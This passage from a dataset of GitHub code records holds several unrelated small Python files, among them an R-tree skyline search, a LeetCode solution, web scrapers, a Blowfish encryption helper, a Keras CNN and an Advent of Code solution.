self.rtree[node_id][IS_LEAF]:\n obj += self.calc_mindist(query_point[C.VAL], min_point=child[C.VAL])\n else:\n obj += self.calc_mindist(query_point[C.VAL], bounding_box=self.rtree[child][MBB])\n self.heap.append(obj)\n self.heap = sorted(self.heap, key=lambda x: x[MINDIST])\n while self.heap:\n expanded_obj = self.heap.pop(0)\n if sky.is_dominated(query_point, expanded_obj[VALUE], self.objects):\n continue\n if not type(expanded_obj[OBJ]) is dict:\n self.find_skyline(expanded_obj[OBJ], query_point)\n else:\n self.objects.append(expanded_obj[OBJ])\n\n\n \"\"\"\n NODE \n \"\"\"\n\n\n def create_node(self, parent_id=None, bounding_box=None, child_id=None, is_leaf=False):\n node_id = max(self.rtree.keys()) + 1 if self.rtree else 1\n if child_id:\n child_id = self.as_list(child_id)\n self.rtree[node_id] = [parent_id, bounding_box, child_id, is_leaf]\n\n # update bounding box \n if child_id and not bounding_box:\n self.update_node(node_id, child_id=child_id)\n return node_id\n\n\n def update_node(self, node_id, parent_id=None, bounding_box=None, child_id=None, is_leaf=False):\n if parent_id:\n self.rtree[node_id][PARENT] = parent_id\n if bounding_box:\n self.rtree[node_id][MBB] = bounding_box\n if is_leaf:\n self.rtree[node_id][IS_LEAF] = is_leaf\n if child_id:\n if type(child_id) is list:\n self.rtree[node_id][CHILD] = child_id\n else:\n self.rtree[node_id][CHILD].append(child_id)\n\n # update is leaf and bounding box\n if self.is_object(self.rtree[node_id][CHILD][0]):\n self.rtree[node_id][IS_LEAF] = True\n MBBs = [self.calc_bounding_box(obj[C.VAL]) for obj in self.rtree[node_id][CHILD]]\n else:\n self.rtree[node_id][IS_LEAF] = False\n MBBs = [self.rtree[child_id][MBB] for child_id in self.rtree[node_id][CHILD]]\n self.rtree[node_id][MBB] = self.adjust_bounding_box(MBBs)\n\n\n \"\"\" \n Searching\n \"\"\"\n\n\n def calc_mindist(self, query_point, min_point=None, bounding_box=None):\n mindist = None\n minpoint = None\n if bounding_box:\n corners = list(itertools.product(*bounding_box)) \n if min_point:\n corners = [min_point]\n for corner in corners:\n dist = 0\n for i in range(len(corner)):\n dist += abs(query_point[i] - corner[i])\n try:\n if dist < mindist:\n mindist = dist\n minpoint = corner\n except:\n mindist = dist\n minpoint = corner\n return [mindist, minpoint]\n\n\n def expand_child(self, bounding_box, children):\n # search child with minimum boundary \n min_boundary = None\n selected_child_id = None\n for child_id in children:\n bounding_box_2 = self.get_bounding_box(child_id)\n boundary = self.calc_boundary(bounding_box, bounding_box_2)\n try:\n if boundary < min_boundary:\n min_boundary = boundary\n selected_child_id = child_id\n except TypeError:\n min_boundary = boundary\n selected_child_id = child_id\n return selected_child_id \n\n\n def find_leaf(self, obj_val, node_id=None):\n # start from root \n if not node_id:\n node_id = self.root\n\n # if the leaf is found \n if self.rtree[node_id][IS_LEAF]:\n return node_id\n\n # choose child for expansion\n bounding_box = self.calc_bounding_box(obj_val)\n child_id = self.expand_child(bounding_box, self.rtree[node_id][CHILD])\n return self.find_leaf(obj_val, child_id)\n \n\n def find_cand(self, node_id, boundary):\n # pruning the child outside the boundary\n cand = []\n for child_id in self.rtree[node_id][CHILD]:\n child_boundary = self.rtree[child_id][MBB]\n if helper.is_intersecting(child_boundary, boundary):\n cand.append(child_id)\n return cand\n\n\n def get_objects(self, node_id, boundary):\n # stop if it is leaf\n if 
self.rtree[node_id][IS_LEAF]:\n children = [node_id]\n else:\n children = self.find_cand(node_id, boundary)\n\n for child_id in children:\n if self.rtree[child_id][IS_LEAF]:\n for obj in self.rtree[child_id][CHILD]:\n if helper.is_inside(obj[C.VAL], boundary):\n self.objects.append(obj)\n else:\n self.get_objects(child_id, boundary)\n\n\n \"\"\" \n Adjust Tree\n \"\"\" \n\n\n def adjust_tree(self, node_id): \n # check if the number of child of node is more than min children defined\n if len(self.rtree[node_id][CHILD]) > self.min_children:\n self.split_node(node_id)\n \n # stop if it is root \n if not self.rtree[node_id][PARENT]:\n return node_id\n \n # continue to adjust the parents \n return self.adjust_tree(self.rtree[node_id][PARENT])\n\n\n def pick_seeds(self, children):\n # get two children that form the largest boundary\n max_boundary = None\n seeds = [None, None]\n for i in range(0, len(children)):\n for j in range(i + 1, len(children)):\n bounding_box_1 = self.get_bounding_box(children[i])\n bounding_box_2 = self.get_bounding_box(children[j])\n boundary = self.calc_boundary(bounding_box_1, bounding_box_2)\n try:\n if boundary > max_boundary:\n max_boundary = boundary\n seeds = [children[i], children[j]]\n except TypeError:\n max_boundary = boundary\n seeds = [children[i], children[j]]\n return seeds\n\n\n def split_node(self, node_id):\n # using quadratic-cost algorithm\n # pick seed\n seeds = self.pick_seeds(self.rtree[node_id][CHILD])\n new_set = [[seeds[0]], [seeds[1]]]\n\n # get other children besides seeds \n if self.is_object(seeds[0]):\n obj_id = list(set([obj[C.ID] for obj in self.rtree[node_id][CHILD]]) - set([obj[C.ID] for obj in seeds]))\n idx = [next((index for (index, d) in enumerate(self.rtree[node_id][CHILD]) if d[C.ID] == oid), None) for oid in obj_id]\n other_children = [self.rtree[node_id][CHILD][i] for i in idx]\n else:\n other_children = list(set(self.rtree[node_id][CHILD]) - set(seeds))\n \n # split other children \n if other_children:\n for child_id in other_children:\n bounding_box = self.get_bounding_box(child_id)\n selected_seed_id = self.expand_child(bounding_box, seeds)\n new_set[seeds.index(selected_seed_id)].append(child_id)\n\n # update the existing node\n self.update_node(node_id, child_id=new_set[0])\n\n # create new root if it is root node\n if not self.rtree[node_id][PARENT]:\n new_root_id = self.create_node(parent_id=None, child_id=node_id)\n # update the parent of existing node\n self.update_node(node_id, parent_id=new_root_id)\n\n # create new splitted node \n new_node_id = self.create_node(parent_id=self.rtree[node_id][PARENT])\n self.update_node(new_node_id, child_id=new_set[1])\n\n # update the parent to add the splitted node as new child\n self.update_node(self.rtree[node_id][PARENT], child_id=new_node_id)\n\n\n \"\"\" \n Bounding box & Boundary\n \"\"\" \n\n\n def adjust_bounding_box(self, MBBs):\n dim = len(MBBs[0])\n MBB = [[min(map(min, [mbb[_] for mbb in MBBs])), max(map(max, [mbb[_] for mbb in MBBs]))] for _ in range(dim)]\n return MBB\n\n \n def calc_bounding_box(self, obj_val):\n return [[val, val] for val in obj_val]\n\n\n def calc_boundary(self, box_1, box_2):\n boundary = 0\n dim = len(box_1)\n for i in range(dim):\n boundary += max([max(box_1[i]), max(box_2[i])]) - min([min(box_1[i]), min(box_2[i])])\n return boundary \n\n\n def get_bounding_box(self, child_id):\n if self.is_object(child_id):\n return self.calc_bounding_box(child_id[C.VAL])\n else:\n return self.rtree[child_id][MBB]\n\n\n \"\"\" \n Helper\n \"\"\" \n\n \n def 
as_list(self, x):\n if type(x) is list:\n return x\n else:\n return [x]\n \n def is_object(self, child):\n return type(child) is dict\n ","repo_name":"mocatfrio/kmppd","sub_path":"application/classes/rtree.py","file_name":"rtree.py","file_ext":"py","file_size_in_byte":11099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14312151618","text":"import random\n\n\nclass RandomizedSet:\n\n def __init__(self):\n self.hashtable = {}\n self.number = [] \n\n def insert(self, val: int) -> bool:\n if val not in self.hashtable:\n self.hashtable[val] = len(self.number)\n self.number.append(val)\n return True\n return False\n\n def remove(self, val: int) -> bool:\n if val in self.hashtable:\n s = self.number[-1]\n self.number[-1], self.number[self.hashtable[val]] = self.number[self.hashtable[val]], self.number[-1]\n self.hashtable[s] = self.hashtable[val]\n self.hashtable.pop(val)\n self.number.pop()\n return True\n return False\n\n def getRandom(self) -> int:\n return self.number[random.randint(0, len(self.number) - 1)]\n\n# Your RandomizedSet object will be instantiated and called as such:\n# obj = RandomizedSet()\n# param_1 = obj.insert(val)\n# param_2 = obj.remove(val)\n# param_3 = obj.getRandom()","repo_name":"Yutao-Zhou/Leetcode","sub_path":"380. Insert Delete GetRandom O(1).py","file_name":"380. Insert Delete GetRandom O(1).py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72302047182","text":"import pandas_datareader as web\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import load_model\nimport matplotlib.pyplot as plt\n\nscaler = MinMaxScaler(feature_range=(0,1))\n\nclass Model:\n def __init__(self, x_shape):\n self.x_shape = x_shape\n self.model = load_model('./model_weights.keras')\n \n def prediction(self, x_data):\n size = len(x_data)\n x_data = x_data.reshape(-1, 1) # Ensure 2D shape for scaling\n scaled_data = scaler.fit_transform(x_data)\n scaled_data = scaled_data[size - self.x_shape:]\n scaled_data = scaled_data.reshape((1, self.x_shape, 1)) # Reshape to 3D for LSTM\n val = self.model.predict(scaled_data)\n return scaler.inverse_transform(val)[0][0]\n \n def extrapolate(self, data, length):\n current_x_data = data\n predictions = []\n for i in range(length):\n prediction = self.prediction(current_x_data)\n predictions.append(prediction)\n current_x_data = np.append(current_x_data, prediction) \n return predictions\n \nmodel = Model(60)\ndf = pd.read_csv('../stocks/AMZN.csv')\ndata = df.filter(['Close'])\ndataset = data.values\npredictions = model.extrapolate(dataset, 10)\ndata = dataset[len(dataset)-100:]\nfull_data = np.concatenate((data, np.array(predictions).reshape(-1, 1)), axis=0) # Concatenate the data and predictions\n\nprint(full_data)\n\nplt.figure(figsize=(16,8))\nplt.title('Fajita Target vs AMZN')\nplt.xlabel('Date',fontsize=18)\nplt.ylabel('Closing Price in USD($)',fontsize=18)\nplt.plot(full_data)\nplt.show()\n","repo_name":"calebrieck/Fajita","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37020606915","text":"#Checkbox Using Application \nimport tkinter as tk \nfrom tkinter import ttk \nwin = tk.Tk() \nwin.title(\"Python GUI App\") \n#Label Creation \nttk.Label(win, text=\"Checkbox status :\").grid(column=0,row=0) 
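\n#--- Added illustrative note (comments only; not in the original file) ---\n#Each Checkbutton below is bound to a tk.IntVar; its state can be read with .get():\n#def show_states():\n# print(chVarDis.get(), chVarUn.get(), chVarEn.get()) #e.g. prints: 1 0 1\n#--------------------------------------------------------------------------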
\n#Create three Checkbox \n#Disabled Checkbox \nchVarDis=tk.IntVar() \ncheck1=tk.Checkbutton(win, text=\"Disabled\", variable=chVarDis, state='disabled') \ncheck1.select() \ncheck1.grid(column=0,row=4, sticky=tk.W) \n#Deselected Checkbox \nchVarUn=tk.IntVar() \ncheck2=tk.Checkbutton(win, text=\"UnChecked\", variable=chVarUn) \ncheck2.deselect() \ncheck2.grid(column=1,row=4, sticky=tk.W) \n#Selected Checkbox \nchVarEn=tk.IntVar() \ncheck3=tk.Checkbutton(win, text=\"Enabled\", variable=chVarEn) \ncheck3.select() \ncheck3.grid(column=2,row=4, sticky=tk.W) \n#Calling Main() \nwin.mainloop() ","repo_name":"SushilPudke/PythonExamples","sub_path":"GUI-Checkbox/check4.py","file_name":"check4.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74832918542","text":"from os import system\nimport sys\n\n# N was undefined in the original script; assume the number of grid-size decades comes from the command line (the default of 5 is a guess)\nN = int(sys.argv[1]) if len(sys.argv) > 1 else 5\n\nnumber_of_gridpoints = [int(10**(i)) for i in range(1,N+1)]\n\nprint(\"Compiling program...\")\nsystem(\"c++ -O3 -c project1_LU.cpp functions.cpp -larmadillo\")\nsystem(\"c++ -O3 -o project1_LU.exe project1_LU.o functions.o -larmadillo\")\n\n\nprint(\"Compilation done, executing\")\nfor n in number_of_gridpoints:\n print(\"computing for n = \" + str(n))\n system(\"./project1_LU.exe\" + \" \" + str(n))\n","repo_name":"benedibn/comphys","sub_path":"projects/project1/codes/mainLU.py","file_name":"mainLU.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26217825163","text":"from AssitentTypeEnum import AssitentTypeEnum\nfrom Assistent import Assistent\nfrom ssml_builder.core import Speech\nimport random\n\nexercicios = [\n \"Biiiiiiiiiiiiixaaaaaaaaaaaaaaaaaaa não\",\n ]\n\nspeech = Speech()\n\nfor item in exercicios:\n speech.add_text(item)\n speech.pause(time=\"1s\")\n\n\n\ntype_asistente = AssitentTypeEnum.AWS\n\nassist = Assistent.factory(type_asistente)\nmp3 = assist.synthesize_speech(speech.speak())\n\nwith open(\"out/{}.mp3\".format(type_asistente.name), 'wb') as out:\n out.write(mp3)\n","repo_name":"adsmaicon/AssistenteGinasticaLaboral","sub_path":"AssitenteGinastica.py","file_name":"AssitenteGinastica.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"16483772393","text":"import pandas as pd\nfrom sklearn import model_selection\nimport os\nimport sys\nimport pickle\nfrom collections import defaultdict\n\n\"\"\"\npicks features for training a model \nparams: list of levels, list of features, title.\n\"\"\"\n\n\nclass Picker:\n def __init__(self):\n with open(os.path.join(sys.path[0], \"ref.txt\"), \"r\") as x:\n for i in x:\n comp_name = i.strip() # strip the trailing newline so the config path below stays valid\n x.close()\n self.locker = self.load_pickle(f\"../configs/configs-{comp_name}/locker.pkl\")\n # ----------------------------------------------------------\n self.list_levels = []\n self.list_features = []\n self.list_feat_title = []\n self.feat_dict = self.load_pickle(\n f\"../configs/configs-{self.locker['comp_name']}/features_dict.pkl\"\n )\n\n def show_variables(self):\n print()\n for i, (k, v) in enumerate(self.__dict__.items()):\n print(f\"{i}. 
{k} :=======>\", v)\n print()\n\n def save_pickle(self, path, to_dump):\n with open(path, \"wb\") as f:\n pickle.dump(to_dump, f)\n\n def load_pickle(self, path):\n with open(path, \"rb\") as f:\n o = pickle.load(f)\n return o\n\n def find_keys(\n self, list_levels=\"--|--\", list_features=\"--|--\", list_feat_title=\"--|--\"\n ):\n # -----------------------------dump feature dictionary\n if list_levels != \"--|--\":\n self.list_levels = list_levels\n if list_features != \"--|--\":\n self.list_features = list_features\n if list_feat_title != \"--|--\":\n self.list_feat_title = list_feat_title\n all_keys = list(self.feat_dict.keys())\n\n valid_keys1 = list(self.feat_dict.keys())\n valid_keys2 = list(self.feat_dict.keys())\n valid_keys3 = list(self.feat_dict.keys())\n if self.list_levels != []:\n valid_keys1 = []\n for key in list(self.feat_dict.keys()):\n t = str(key).split(\"_\")[1]\n if t in str(self.list_levels):\n valid_keys1.append(key)\n if self.list_features != []:\n valid_keys2 = []\n for key in list(self.feat_dict.keys()):\n t = str(key).split(\"_\")[3]\n if t in str(self.list_features):\n valid_keys2.append(key)\n if self.list_feat_title != []:\n valid_keys3 = []\n for key, val in list(self.feat_dict.items()):\n if str(val[2]) in str(self.list_feat_title):\n valid_keys3.append(key)\n valid_keys = set(valid_keys1).intersection(set(valid_keys2))\n valid_keys = list(valid_keys.intersection(set(valid_keys3)))\n return valid_keys\n\n def find_features(\n self, list_levels=\"--|--\", list_features=\"--|--\", list_feat_title=\"--|--\"\n ):\n # -----------------------------dump feature dictionary\n if list_levels != \"--|--\":\n self.list_levels = list_levels\n if list_features != \"--|--\":\n self.list_features = list_features\n if list_feat_title != \"--|--\":\n self.list_feat_title = list_feat_title\n valid_keys = self.find_keys(\n self.list_levels, self.list_features, self.list_feat_title\n )\n valid_features = []\n for key in valid_keys:\n valid_features += self.feat_dict[key][0]\n return valid_features\n\n def help(self):\n # display all the feature engineering done so far\n # Key:- f\"l{self.level_no}_f{feat_no}\"\n # value:- [created, from , info]\n for key, value in self.feat_dict.items():\n print(key, f\"{value[-1]} :-\")\n print(\"features created:\")\n print(value[0])\n print(\"from:\")\n print(value[1])\n print(\"=\" * 40)\n\n\nif __name__ == \"__main__\":\n p = Picker()\n # p.list_levels = [\"1\"]\n # p.list_features = [\"1\", \"2\", \"0\"]\n p.list_feat_title = [\"unique_characters\"]\n print(p.find_keys())\n print()\n print(p.find_features())\n","repo_name":"ar8372/Framework3","sub_path":"src-framework3/feature_picker.py","file_name":"feature_picker.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21999762652","text":"from selenium import webdriver # Loads Selenium WebDriver\n# from selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By # Loads .BY\nimport time\n\nURL = f\"https://www.simplyrecipes.com/trinidadian-macaroni-pie-recipe-6830792\" # Macro holding scraping target URL\nRECIPE_TITLE = \"recipe-block__header_1-0\" # ElementID for name of dish on SimplyRecipes (SR) recipe page\nRECIPE_INFO = \"recipe-block__meta_1-0\" # ElementID for prep time, cook time, combined time, and servings on SR recipe page\nINGREDIENTS = \"section--ingredients_1-0\" # ElementID for ingredient list on SR recipe page\nMETHOD = 
\"section--instructions_1-0\" # ElementID for cooking instructions on SR recipe page\nPATH = \"/usr/local/bin/chromedriver\" # Filepath for Selenium Chromedriver\nSPACER = f\"\\n\\n ------------------------------- \\n\" # Visual spacer for terminal output\nEND = f\"\\n\\n --------------END--------------\" # Visual spacer for terminal output, notates end of program output\n\ndriver = webdriver.Chrome(PATH) # assigns Chromedriver\n\ndriver.get(URL) # Passes URL to Chromedriver\nrecipe_title = driver.find_element(By.ID, RECIPE_TITLE) # Retrieves name of dish from SR recipe page\nrecipe_info = driver.find_element(By.ID, RECIPE_INFO) # Retrieves prep time, cook time, combined time, and servings from SR recipe page\ningredients = driver.find_element(By.ID, INGREDIENTS) # Retrieves ingredient list from SR recipe page\nmethod = driver.find_element(By.ID, METHOD) # Retrieves cooking instructions from SR recipe page\nprint(recipe_title.text + SPACER) # Prints retrieved name of dish\nprint(recipe_info.text + SPACER) # Prints retrieved prep time, cook time, combined time, and servings\nprint(ingredients.text + SPACER) # Prints retrieved ingredient list\nprint(method.text + END) # Prints retrieved cooking instructions\n\ndriver.quit() # Halts Chromedriver. Pretty self-explanatory\n","repo_name":"jacobh7/recipe_scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14370728910","text":"# -*- coding: utf-8 -*-\n# Input#\nimport math\n\n# n = int(input())\nN, M = map(int, input().split())\na = list(map(int, input().split()))\nb = list(map(int, input().split()))\nINF = 100000000000\nans = 0\n\n\ndef check(a, b):\n ans = 0\n for i in range(len(a)):\n if a[i] != b[i]:\n ans += 1\n return ans\n\n\ndef diffcheck(a, b):\n ans = INF\n diff = len(a) - len(b)\n if diff == 1:\n for i in range(len(a)):\n ans = min(check(a[0:i] + a[i + 1 :], b), ans)\n else:\n for i in range(len(a)):\n ans = min(diffcheck(a[0:i] + a[i + 1 :], b), ans)\n return ans + 1\n\n\nif len(a) == len(b):\n ans = check(a, b)\nelse:\n if len(a) < len(b):\n tmp = a\n a = b\n b = tmp\n ans = diffcheck(a, b)\n\nprint(\"{}\".format(ans))\n","repo_name":"katataku/atcoder","sub_path":"Contest/ABC185/e/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19002933268","text":"from functools import lru_cache\n\n\nclass Solution:\n def numSquarefulPerms(self, A: \"List[int]\") -> \"int\":\n l = len(A)\n out = [0] # global variable to keep track of total number of permutations\n c = dict(collections.Counter(A)) # element - counts\n s = [] # stack\n\n @lru_cache(maxsize=None)\n def is_square(s):\n return int(math.sqrt(s)) ** 2 == s\n\n def dfs(stack, counts):\n if len(stack) == l:\n out[0] += 1\n return\n # keep track of options to avoid duplicate steps\n options = [k for k, v in counts.items() if v > 0]\n for o in options:\n # can take a step if the stack is empty\n # or the tip of the stack + option is square\n if len(stack) == 0 or is_square(stack[-1] + o):\n # dfs + backtrack\n counts[o] -= 1\n stack.append(o)\n dfs(stack, counts)\n stack.pop()\n counts[o] += 1\n\n dfs(s, c)\n return 
out[0]\n","repo_name":"devilhtc/leetcode-solutions","sub_path":"0x03e4_996.Number_of_Squareful_Arrays/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"3975573670","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\n\n#Load the dataset\ndata = pd.read_csv('german_credit.csv', sep=',', decimal='.')\n\n#Randomly split the dataset into two parts, the training set and the test set\ntrain, test = train_test_split(data, test_size=0.1, random_state=42)\n\n#change all categorical variables to integer\ntrain = train.apply(lambda x: pd.factorize(x)[0])\ntest = test.apply(lambda x: pd.factorize(x)[0])\n\n\n#1. create the model\nmodelo = RandomForestClassifier(n_estimators=100, random_state=40)\n\n\n\n#2. train the model\nmodelo.fit(train.drop('Creditability', axis=1), train['Creditability'])\n\n#3. predict\nprediccion_train = modelo.predict(train.drop('Creditability', axis=1))\nprediccion_test = modelo.predict(test.drop('Creditability', axis=1))\n\n#4. compute the accuracy\nprecision_train = sum(prediccion_train == train['Creditability']) / len(train) * 100\nprecision_test = sum(prediccion_test == test['Creditability']) / len(test) * 100\n\nprint('Training set accuracy: ', precision_train)\nprint('Test set accuracy: ', precision_test)\n\n\n\n\n#2. confusion matrix for Random Forest\nmatriz_confusion = confusion_matrix(test['Creditability'], prediccion_test)\n#as a percentage\nmatriz_confusion = matriz_confusion / len(test) * 100\n\nprint('Confusion matrix for Random Forest: \\n', matriz_confusion)\n\n\n\n\n#2. 
accuracy curve plot for Random Forest\n\"\"\"\nprecision_train = []\nprecision_test = []\nnodos = []\n\nfor i in range(1, 10):\n modelo = RandomForestClassifier(n_estimators=i, random_state=0)\n modelo.fit(train.drop('Creditability', axis=1), train['Creditability'])\n prediccion_train = modelo.predict(train.drop('Creditability', axis=1))\n prediccion_test = modelo.predict(test.drop('Creditability', axis=1))\n precision_train.append(sum(prediccion_train == train['Creditability']) / len(train) * 100)\n precision_test.append(sum(prediccion_test == test['Creditability']) / len(test) * 100)\n nodos.append(i)\n\nplt.plot(nodos, precision_train, label='Training set')\n\nplt.plot(nodos, precision_test, label='Test set')\n\nplt.xlabel('Number of nodes')\nplt.ylabel('Accuracy')\nplt.title('Accuracy curve for Random Forest')\nplt.legend()\nplt.show()\n\"\"\"\n","repo_name":"papekoja/72.75-ML","sub_path":"TP2/random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3256020198","text":"from sqlmodel import SQLModel, Session, create_engine\nfrom app.config import get_setting\n\nsetting = get_setting()\ndb_url = setting.db_url\nengine = create_engine(db_url, connect_args={'check_same_thread': False})\n\n\ndef create_db_and_tables():\n SQLModel.metadata.create_all(engine)\n\n\ndef get_session():\n with Session(engine) as session:\n yield session\n","repo_name":"ibrahim4529/fastapi-auth-rest","sub_path":"app/db/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6832851257","text":"from Crypto.Cipher import Blowfish\nfrom struct import pack\n\n# MSG MUST BE A STRING\ndef bf_enc(msg,key):\n if(type(msg) != bytes):\n encoded=msg.encode('utf-8')\n msg = bytearray(encoded)\n if(type(key) != bytes):\n encoded=key.encode('utf-8')\n key = bytearray(encoded)\n bs = Blowfish.block_size\n cipher = Blowfish.new(key, Blowfish.MODE_CBC)\n\n plen = bs - len(msg) % bs\n padding = [plen]*plen\n padding = pack('b'*plen, *padding)\n c_text = cipher.iv + cipher.encrypt(msg + padding)\n return c_text\n\n# CTEXT MUST BE A BYTE ARRAY\ndef bf_dec(c_text,key):\n bs = Blowfish.block_size\n iv = c_text[:bs]\n c_text = c_text[bs:]\n\n cipher = Blowfish.new(key, Blowfish.MODE_CBC, iv)\n msg = cipher.decrypt(c_text)\n\n last_byte = msg[-1]\n msg = msg[:- (last_byte if type(last_byte) is int else ord(last_byte))]\n return msg.decode(encoding=\"unicode_escape\")\n\nkey = b\"this is a big stuff that is important\"\n\n\n","repo_name":"amyyyth/audio-stegano-blowfish","sub_path":"blowfish.py","file_name":"blowfish.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"25803124063","text":"from tensorflow.keras import *\nfrom tensorflow.keras.layers import *\n\n\ndef cnn(num_classes, height, width, channels):\n \"\"\"\n\n :param num_classes: Number of classes to classify\n :param height: Height of images\n :param width: Width of images\n :param channels: The number of channels of images (3 if rgb)\n :return: model\n \"\"\"\n\n input_shape = (height, width, channels)\n\n model = Sequential()\n model.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape, strides=1))\n model.add(Conv2D(64, (3, 3), 
activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.5))\n model.add(Flatten())\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(num_classes, activation='softmax'))\n\n return model\n","repo_name":"caim03/ImageClassification","sub_path":"model/custom_cnn.py","file_name":"custom_cnn.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27919928100","text":"#!/usr/bin/env python3\n# Memorise Me!!!\n# solved by: Himanshu Shekhar\n\nx, y = map(int, input().split())\n\n# read an x-by-y matrix, one row per line\narr = [list(map(int, input().split())) for _ in range(x)]\n\n# build the transpose (y rows of x columns)\ntranspose = [[arr[i][j] for i in range(x)] for j in range(y)]\n\nprint(transpose)\n","repo_name":"palhiman/Lab-Practices","sub_path":"dataStructure/transpose.py","file_name":"transpose.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73376488141","text":"import csv\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nurl = 'https://guide.michelin.com/us/en/restaurants/'\n\nmichelin_urls = {\n \"3-stars-michelin\": 7,\n \"2-stars-michelin\": 25,\n \"1-star-michelin\": 138,\n \"bib-gourmand\": 169,\n \"sustainable_gastronomy\": 22\n}\n\nfor entry in michelin_urls.items():\n level = entry[0]\n pages = entry[1]\n request_url = url + level\n i = 1\n all_entries = []\n\n while i <= pages:\n\n response = requests.get(url=request_url)\n\n soup = BeautifulSoup(response.content, 'html.parser')\n restaurants = soup.find_all('div', attrs={\"class\": \"card__menu-content\"})\n\n for restaurant in restaurants:\n # michelin_award = restaurant.find('img', attrs={\"class\": \"michelin-award\"})\n # award_type = michelin_award['src']\n # right_index = award_type.rfind('.')\n # left_index = award_type.find('/')\n # award = award_type[left_index, right_index]\n\n restaurant_title = restaurant.find('h3', attrs={\"class\": \"card__menu-content--title\"})\n title = restaurant_title.text.strip()\n\n restaurant_location = restaurant.find('div', attrs={\"class\": \"card__menu-footer--location\"})\n location = restaurant_location.text.strip()\n\n restaurant_cuisine = restaurant.find('div', attrs={\"class\": \"card__menu-footer--price\"})\n cuisine_raw = restaurant_cuisine.text\n\n cuisine_index = cuisine_raw.rfind('·')\n if cuisine_index == -1:\n cuisine = cuisine_raw.strip()\n else:\n cuisine = cuisine_raw[cuisine_index + 1:]\n cuisine = cuisine.strip()\n\n\n entry = [level, location, title, cuisine]\n print(entry)\n all_entries.append(entry)\n\n i += 1\n\n if i == 2:\n request_url = request_url + '/page/'\n else:\n request_url = request_url[:request_url.rfind('/') + 1]\n\n request_url = request_url + str(i)\n\n with open('michelin.csv', 'a', encoding=\"utf-8\", newline='') as file:\n writer = csv.writer(file)\n writer.writerows(all_entries)\n\n all_entries = []\n","repo_name":"joegramstad/buckit_tooling","sub_path":"web_scrapers/michelin_scraper.py","file_name":"michelin_scraper.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"36630715777","text":"# Question_Link = https://platform.stratascratch.com/coding/10353-workers-with-the-highest-salaries?code_type=2\n\n# Import your libraries\nimport pandas as pd\n\ndf_merge = worker.merge(title, left_on='worker_id', right_on='worker_ref_id')\n\ndf_max_salary = df_merge[df_merge['salary'] == df_merge['salary'].max()]\n\nresult = 
df_max_salary['worker_title']\n","repo_name":"Ateeth/Data-Science-Interview-Questions","sub_path":"Coding/Medium/Workers-With-The-Highest-Salaries-10353.py","file_name":"Workers-With-The-Highest-Salaries-10353.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"21159777956","text":"#!/usr/bin/env python\nimport string\n\n\ndef create_decode_dict():\n priorities = {}\n for k, v in zip(list(string.ascii_lowercase), range(1, 27)):\n priorities[k] = v\n for k, v in zip(list(string.ascii_uppercase), range(27, 53)):\n priorities[k] = v\n return priorities\n\n\ndef calculate_score_part1(errors, priorities):\n score = 0\n for e in errors:\n score += priorities[e]\n return score\n\ndef calculate_score_part2(errors, priorities):\n score = 0\n for e in [item for sublist in errors for item in sublist]:\n score += priorities[e]\n return score\n\ndef find_same_item(errors):\n return list(set.intersection(*map(set, errors)))\n\n\ndef solve():\n errors_part1 = []\n errors_part2 = []\n priorities = create_decode_dict()\n group_of_three = []\n with open(\"day3_input\", \"r\") as f:\n for line in f: \n letters = [l for l in line.strip()]\n errors_part1.append(find_same_item([letters[:len(letters)//2], 